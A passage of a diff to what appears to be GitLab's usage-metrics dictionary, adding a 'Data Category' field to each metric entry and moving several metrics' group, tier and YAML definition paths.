-5274,6 +6300,8 @@ A count of projects with the cleanup policy for tags turned on Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5286,6 +6314,8 @@ A count of projects with the cleanup policy set to run every 14 days Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5298,6 +6328,8 @@ A count of projects with the cleanup policy set to run every day Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5310,6 +6342,8 @@ A count of projects with the cleanup policy set to run monthly Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5322,6 +6356,8 @@ A count of projects with the cleanup policy set to run every 3 months Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5334,6 +6370,8 @@ A count of projects with the cleanup policy set to run every 7 days Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5346,6 +6384,8 @@ A count of projects with the cleanup policy set to keep 1 tag Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5358,6 +6398,8 @@ A count of projects with the cleanup policy set to keep 10 tags Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5370,6 +6412,8 @@ A count of projects with the cleanup policy set to keep 100 tags Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5382,6 +6426,8 @@ A count of projects with the cleanup policy set to keep 25 tags Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5394,6 +6440,8 @@ A count of projects with the cleanup policy set to keep 5 tags Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5406,6 +6454,8 @@ A count of projects with the cleanup policy set to keep 50 tags Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5418,6 +6468,8 @@ A count of projects with the cleanup policy with the number of tags to keep unse Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5430,6 +6482,8 @@ A count of projects with the cleanup policy set delete tags older than 14 days Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5442,6 +6496,8 @@ A count of projects with the cleanup policy set delete tags older than 30 days Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5454,6 +6510,8 @@ A count of projects with the cleanup policy set delete tags older than 7 days Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5466,6 +6524,8 @@ A count of projects with the cleanup policy set delete tags older than 90 days Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5478,6 +6538,8 @@ A count of projects with the cleanup policy with the number of tags to delete un Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5490,6 +6552,8 @@ Projects with package registry enabled Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5502,6 +6566,8 @@ Projects with Prometheus alerting enabled Group: `group::monitor` +Data Category: `Optional` + Status: `removed` Tiers: `free` @@ -5514,6 +6580,8 @@ Count of users creating projects that have a matching Git repository, result of Group: `group::source code` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -5526,6 +6594,8 @@ Count of projects with Terraform MR reports Group: `group::configure` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5538,6 +6608,8 @@ Count of projects with GitLab Managed Terraform State Group: `group::configure` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5550,6 +6622,8 @@ Projects with tracing enabled Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5562,6 +6636,8 @@ Count of projects with active integrations for YouTrack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5574,6 +6650,8 @@ Count of total protected branches Group: `group::source code` +Data Category: `Operational` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -5586,6 +6664,8 @@ Count of branches that have been protected and are not the default branch Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5598,6 +6678,8 @@ Unique release tags Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -5610,6 +6692,8 @@ Count of total remote mirrors. Includes both push and pull mirrors Group: `group::source code` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5622,6 +6706,8 @@ Count of requirement test reports created from CI Group: `group::certify` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -5634,6 +6720,8 @@ Count of requirement test reports created manually Group: `group::certify` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -5646,6 +6734,8 @@ Count of requirements created Group: `group::certify` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -5658,6 +6748,8 @@ Count of requirements having a test report Group: `group::certify` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -5670,18 +6762,22 @@ Count of SAST CI jobs for the month. Job names ending in '-sast' Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts.secret_detection_jobs` -Count of 'secret-detection' CI jobs fro the month. +Count of all 'secret-detection' CI jobs. [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216182114_secret_detection_jobs.yml) Group: `group::static analysis` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5694,6 +6790,8 @@ Count of service desk enabled projects Group: `group::certify` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -5706,6 +6804,8 @@ Count of service desk issues Group: `group::certify` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -5718,6 +6818,8 @@ Count of comments on Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5730,6 +6832,8 @@ Count of newly created Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5742,6 +6846,8 @@ Count of updates to existing Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5754,6 +6860,8 @@ Count of all Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5766,6 +6874,8 @@ Count of total Git push operations Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5778,6 +6888,8 @@ Count of commits created from the Static Site Editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5790,6 +6902,8 @@ Count of merge requests created via Static Site Editor Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5802,6 +6916,8 @@ Count of Static Site Editor views Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5810,49 +6926,57 @@ Tiers: `free`, `premium`, `ultimate` Cumulative count of usages of publish operation -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180502_status_page_incident_publishes.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180502_status_page_incident_publishes.yml) + +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `ultimate` ### `counts.status_page_incident_unpublishes` Cumulative count of usages of unpublish operation -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180504_status_page_incident_unpublishes.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180504_status_page_incident_unpublishes.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `ultimate` ### `counts.status_page_issues` Issues published to a Status Page -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180507_status_page_issues.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180507_status_page_issues.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `ultimate` ### `counts.status_page_projects` Projects with status page enabled -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_all/20210216180506_status_page_projects.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_all/20210216180506_status_page_projects.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `ultimate` ### `counts.successful_deployments` @@ -5862,6 +6986,8 @@ Total successful deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -5874,6 +7000,8 @@ Count of all comments that contain suggested changes Group: `group::code review` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5886,6 +7014,8 @@ Count of total repo templates used to aggregate all file templates Group: `group::source code` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -5898,6 +7028,8 @@ Count of active service templates for Asana Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5910,6 +7042,8 @@ Count of active service templates for Assembla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5922,6 +7056,8 @@ Count of active service templates for Bamboo CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5934,6 +7070,8 @@ Count of active service templates for Bugzilla Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5946,6 +7084,8 @@ Count of active service templates for Buildkite Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5958,6 +7098,8 @@ Count of active service templates for Campfire Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5970,6 +7112,8 @@ Count of active service templates for Confluence Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5982,6 +7126,8 @@ Count of active service templates for a Custom Issue Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -5994,6 +7140,8 @@ Count of active service templates for Datadog Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6006,6 +7154,8 @@ Count of active service templates for Discord Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6018,6 +7168,8 @@ Count of active service templates for Drone CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6030,6 +7182,8 @@ Count of active service templates for Emails on Push Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6042,6 +7196,8 @@ Count of active service templates for EWM Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6054,6 +7210,8 @@ Count of active service templates for External Wiki Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6066,6 +7224,8 @@ Count of active service templates for Flowdock Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6078,6 +7238,8 @@ Count of active service templates for GitHub Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -6090,6 +7252,8 @@ Count of active service templates for Hangouts Chat Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6102,6 +7266,8 @@ Count of active service templates for HipChat Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -6114,6 +7280,8 @@ Count of active service templates for Irker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6126,6 +7294,8 @@ Count of active service templates for Jenkins Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6138,6 +7308,8 @@ Count of active service templates for Jira Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6150,6 +7322,8 @@ Count of active service templates for Mattermost Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6162,6 +7336,8 @@ Count of active service templates for Mattermost (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6174,6 +7350,8 @@ Count of active service templates for Microsoft Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6186,6 +7364,8 @@ Count of active service templates for Mock CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -6198,6 +7378,8 @@ Count of active service templates for Mock Monitoring Group: `group::ecosystem` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -6210,6 +7392,8 @@ Count of active service templates for Packagist Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6222,6 +7406,8 @@ Count of active service templates for Pipeline Emails Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6234,6 +7420,8 @@ Count of active service templates for Pivotal Tracker Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6246,6 +7434,8 @@ Count of active service templates for Prometheus Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6258,6 +7448,8 @@ Count of active service templates for Pushover Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6270,6 +7462,8 @@ Count of active service templates for Redmine Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6282,6 +7476,8 @@ Count of active service templates for Slack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6294,6 +7490,8 @@ Count of active service templates for Slack (slash commands) Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6306,6 +7504,8 @@ Count of active service templates for Teamcity CI Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6318,6 +7518,8 @@ Count of active service templates for Unifiy Circuit Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6330,6 +7532,8 @@ Count of active service templates for Webex Teams Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6342,6 +7546,8 @@ Count of active service templates for YouTrack Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6354,6 +7560,8 @@ Count of Terraform MR reports generated Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6366,6 +7574,8 @@ Count of GitLab Managed Terraform States Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6378,6 +7588,8 @@ Count of todos created Group: `group::project management` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6390,6 +7602,8 @@ Count of Uploads via Notes and Descriptions Group: `group::project management` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6402,6 +7616,8 @@ Count of users who set personal preference to see Details on Group information p Group: `group::threat insights` +Data Category: `Optional` + Status: `data_available` Tiers: `ultimate` @@ -6414,6 +7630,8 @@ Count of users who set personal preference to see Security Dashboard on Group in Group: `group::threat insights` +Data Category: `Operational` + Status: `data_available` Tiers: `ultimate` @@ -6426,6 +7644,8 @@ Count of users with the GitPod integration enabled Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6438,6 +7658,8 @@ Missing description Group: `group::ecosystem` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -6450,6 +7672,8 @@ Count of commits made from the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6462,6 +7686,8 @@ Count of merge requests created from the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6474,6 +7700,8 @@ Count of Pipeline tab views in the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6486,6 +7714,8 @@ Count of Live Preview tab views in the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6498,6 +7728,8 @@ Count of Web Terminal tab views in the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6510,6 +7742,8 @@ Count of views of the Web IDE Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6522,6 +7756,8 @@ Count of all Wiki pages created Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6534,6 +7770,8 @@ Count of all Wiki pages deleted Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6546,6 +7784,8 @@ Count of all Wiki page updates Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6558,6 +7798,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -6570,6 +7812,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6582,6 +7826,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6594,21 +7840,25 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts_monthly.aggregated_metrics.compliance_features_track_unique_visits_union` -Missing description +Unique users that have used audit event screen, audit event API, compliance dashboard, or credential inventory -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216183201_compliance_features_track_unique_visits_union.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_28d/20210216183201_compliance_features_track_unique_visits_union.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `premium`, `ultimate` ### `counts_monthly.aggregated_metrics.i_testing_paid_monthly_active_user_total` @@ -6618,6 +7868,8 @@ Aggregated count of users who have engaged with a Premium or Ultimate tier testi Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -6628,11 +7880,13 @@ Count of unique users per month to take an action on an alert [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180509_incident_management_alerts_total_unique_counts.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `counts_monthly.aggregated_metrics.incident_management_incidents_total_unique_counts` @@ -6640,11 +7894,13 @@ Count of unique users per month to take an action on an incident [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_28d/20210216180511_incident_management_incidents_total_unique_counts.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: `free` +Tiers: `free`, `premium`, `ultimate` ### `counts_monthly.aggregated_metrics.product_analytics_test_metrics_intersection` @@ -6654,6 +7910,8 @@ This was test metric used for purpose of assuring correct implementation of aggr Group: `group::product intelligence` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -6666,6 +7924,8 @@ This was test metric used for purpose of assuring correct implementation of aggr Group: `group::product intelligence` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -6678,6 +7938,8 @@ Total deployments count for recent 28 days Group: `group::ops release` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6690,6 +7952,8 @@ Total failed deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -6702,6 +7966,8 @@ A monthly count of packages published to the registry Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6714,6 +7980,8 @@ Monthly count of personal Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6726,6 +7994,8 @@ Monthly count of project Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6738,6 +8008,8 @@ Count number of projects created monthly Group: `group::project management` +Data Category: `Optional` + Status: `implemented` Tiers: `free`, `premium`, `ultimate` @@ -6750,6 +8022,8 @@ Monthly count of unique projects with HTTP alerting enabled Group: `group::monitor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6762,6 +8036,8 @@ Monthly count of All Snippets Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6774,6 +8050,8 @@ Total successful deployments Group: `group::release` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -6786,6 +8064,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6798,6 +8078,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6810,21 +8092,25 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` ### `counts_weekly.aggregated_metrics.compliance_features_track_unique_visits_union` -Missing description +Unique users that have used audit event screen, audit event API, compliance dashboard, or credential inventory [YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216183211_compliance_features_track_unique_visits_union.yml) -Group: `` +Group: `group::compliance` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `premium`, `ultimate` ### `counts_weekly.aggregated_metrics.i_testing_paid_monthly_active_user_total` @@ -6834,6 +8120,8 @@ Aggregated count of users who have engaged with a Premium or Ultimate tier testi Group: `group::testing` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -6842,25 +8130,29 @@ Tiers: `premium`, `ultimate` Count of unique users per week to take an action on an alert -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180513_incident_management_alerts_total_unique_counts.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180513_incident_management_alerts_total_unique_counts.yml) -Group: `group::health` +Group: `group::monitor` + +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `counts_weekly.aggregated_metrics.incident_management_incidents_total_unique_counts` Count of unique users per week to take an action on an incident -[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/ee/config/metrics/counts_7d/20210216180515_incident_management_incidents_total_unique_counts.yml) +[YAML definition](https://gitlab.com/gitlab-org/gitlab/-/blob/master/config/metrics/counts_7d/20210216180515_incident_management_incidents_total_unique_counts.yml) + +Group: `group::monitor` -Group: `group::health` +Data Category: `Optional` Status: `data_available` -Tiers: +Tiers: `free`, `premium`, `ultimate` ### `counts_weekly.aggregated_metrics.product_analytics_test_metrics_intersection` @@ -6870,6 +8162,8 @@ This was test metric used for purpose of assuring correct implementation of aggr Group: `group::product intelligence` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -6882,6 +8176,8 @@ This was test metric used for purpose of assuring correct implementation of aggr Group: `group::product intelligence` +Data Category: `Optional` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -6894,6 +8190,8 @@ This metric only returns a value of PostgreSQL in supported versions of GitLab. Group: `group::enablement distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6906,6 +8204,8 @@ TBD Group: `group::distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -6918,6 +8218,8 @@ The version of the PostgreSQL database. Group: `group::distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6930,6 +8232,8 @@ A count of projects where the dependency proxy is enabled Group: `group::package` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6942,6 +8246,8 @@ Edition of GitLab such as EE or CE Group: `group::distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6954,6 +8260,8 @@ Whether Elasticsearch is enabled Group: `group::global search` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -6966,6 +8274,8 @@ Is Geo enabled? Group: `group::geo` +Data Category: `Optional` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -6978,6 +8288,8 @@ Information about Git version Group: `group::distribution` +Data Category: `Operational` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -6990,6 +8302,8 @@ Total GitLab Managed clusters both enabled and disabled Group: `group::product intelligence` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -7002,6 +8316,8 @@ Missing description Group: `` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7014,6 +8330,8 @@ Total Gitalty Servers Group: `group::product intelligence` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -7026,6 +8344,8 @@ Version of Gitaly Group: `group::product intelligence` +Data Category: `Operational` + Status: `data_available` Tiers: `free` @@ -7038,6 +8358,8 @@ Whether GitLab Pages is enabled Group: `group::product intelligence` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7050,6 +8372,8 @@ The version number of GitLab Pages Group: `group::product intelligence` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7062,6 +8386,8 @@ Whether shared runners is enabled Group: `group::runner` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7074,6 +8400,8 @@ Whether Gitpod is enabled in the instance Group: `group::editor` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7086,6 +8414,8 @@ Whether Grafana is enabled Group: `group::product intelligence` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7098,6 +8428,8 @@ Whether gravatar is enabled Group: `group::access` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7110,6 +8442,8 @@ The peak active user count. Active is defined in UsersStatistics model. Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7122,6 +8456,8 @@ Host name of GitLab instance Group: `group::product intelligence` +Data Category: `Standard` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7134,6 +8470,8 @@ Whether or not ModSecurity is enabled within Ingress Group: `group::container security` +Data Category: `Operational` + Status: `removed` Tiers: `free`, `premium`, `ultimate` @@ -7146,6 +8484,8 @@ The installation method used to install GitLab (Omnibus, Helm, etc) Group: `group::distribution` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7158,6 +8498,8 @@ Whether auto DevOps is enabled Group: `group::configure` +Data Category: `Optional` + Status: `data_available` Tiers: `free`, `premium`, `ultimate` @@ -7170,6 +8512,8 @@ Whether LDAP is enabled Group: `group::product intelligence` +Data Category: `Optional` + Status: `data_available` Tiers: `free` @@ -7182,6 +8526,8 @@ Number of all billable users (active users excluding bots and guests). Group: `group::product intelligence` +Data Category: `Optional` + Status: `implemented` Tiers: `premium`, `ultimate` @@ -7194,6 +8540,8 @@ The date the license ends Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7206,6 +8554,8 @@ The ID of the license Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7218,6 +8568,8 @@ The MD5 hash of license key of the GitLab instance Group: `group::license` +Data Category: `Standard` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7230,6 +8582,8 @@ The plan of the GitLab license Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7242,6 +8596,8 @@ The date the license starts Group: `group::license` +Data Category: `Subscription` + Status: `data_available` Tiers: `premium`, `ultimate` @@ -7254,6 +8610,8 @@ Licese zuora_subscription_id Group: `group::license` +Data Category: `Standard` + 